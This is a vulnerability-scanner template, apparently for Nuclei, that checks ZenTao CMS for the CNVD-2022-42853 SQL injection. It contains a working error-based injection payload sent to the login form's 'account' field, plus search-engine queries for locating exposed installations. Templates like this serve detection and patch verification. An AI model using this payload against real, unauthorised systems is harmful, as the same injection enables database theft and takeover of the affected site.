id: CNVD-2022-42853

info:
  name: ZenTao CMS - SQL Injection
  author: ling
  severity: critical
  description: |
    ZenTao CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go
    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"zentao"
    fofa-query: "Zentao"
  tags: 易软天创-禅道系统
variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /zentao/user-login.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}/zentao/user-login.html

        account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1

    matchers:
      - type: word
        part: body
        words:
          - 'c8c605999f3d8352d7bb792cf3fdb25'

# digest: 4a0a00473045022009572d4885de4de6ef2312a58a67d6c67fefd27b962fa80a8e3864193987c66f022100e190d2836fe344522dc84ded60b1213a62631baac598ca6dd444edfff9ec535c:922c64590222798bb761d5b6d8e72950
